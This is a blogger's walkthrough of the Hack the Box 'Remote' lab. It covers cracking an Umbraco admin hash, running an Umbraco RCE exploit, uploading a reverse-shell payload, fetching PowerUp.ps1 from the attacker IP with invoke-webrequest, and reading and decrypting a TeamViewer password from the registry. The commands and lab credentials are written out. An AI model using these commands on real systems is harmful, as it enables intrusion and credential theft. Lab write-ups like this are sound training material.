Remote-Hack the box w/0 Metasploit.

Remote is an easy windows machine from Hack the box.

Lets get started with the result nmap scan

At port 80 there was a http server running

When I naviagated through the pages I found some names which could be potential usernames

I thought of brute forcing these usernames on smb service

In parallel I also initiated gobuster and got below output

From the /umbraco page I got a login page

I tried based sql injection but was not working

Here I got introduced to umbraco cms. Straight away I googles for umbraco exploit.

But I am not sure about the version running and also the exploit needed some admin credentials

Later when I examined the nmap results I saw port 111. So there are possibility of RPC like nfs, nlockmgr etc

I tried to check it using showmount command

Lets enumerate this backup!!

From this list I decided to investigate on web.config for possible passwords

I was not able to locate any usefull password. But I got a file names

Umbraco.sdf

using find command I located the file and using strings command I was able to find admin hash

[email protected]

hash : b8be16afba8c314ad33d812f22a04991b90e2aaa

By using john I was able to decrypt the password in no time

the password is baconandcheese

I tried to login to Umbaco portal with these credentials

I just confirmed the Umbraco version v7.12.4

A customised exploit for the cve was found from github

https://github.com/noraj/Umbraco-RCE

I was able to do RCE , In the below example I executed ‘systeminfo’ command

python3 exploit.py -u [email protected] -p baconandcheese -i ‘http://10.10.10.180’ -c powershell.exe -a ‘-NoProfile -Command systeminfo’

I uploaded a payload which can connect back to my attacker machine using msfvenom

I was able to upload it through CMS dashboard

I was able to locate the shell I uploaded

now time to execute and obtain the shell

python3 exploit.py -u [email protected] -p baconandcheese -i ‘http://10.10.10.180’ -c powershell.exe -a ‘-NoProfile -Command C:/inetpub/wwwroot/media/1038/ehackify.exe’

with in no time I got the shell

I downloaded the poweup.ps1 to the target machine for enumerating prev escalation
invoke-webrequest -Uri http://10.10.14.195/Powerup.ps1 -outfile p.ps1

Its possible to abuse the UsoSvc service at C:\Windows\system32\svchost.exe

I also ran winPEAS.exe

and I was able to know teamviewer was running

I decided to move with out metasploit

https://docs.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-entries?view=powershell-7

I navigated towards the teamViewer file location and execute below commands for extracting password

Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7

I was able to read the SecurityPasswordAES with below command

(New-Object -ComObject WScript.Shell).RegRead(“HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7\SecurityPasswordAES”)

These numbers are integers with base 10 and we have to conert them to base 16

From github I was able to find a script yo decrypt this and I got the password as

!R3m0te!

Next is to login as administrator with this password.

I used evil-Winrm to login

System Compromised!

If you found this write up useful, you can respect me on hackthebox

https://www.hackthebox.eu/home/users/profile/240146

You can connect me on

LinkedIn: Derick N

Twitter: Derick N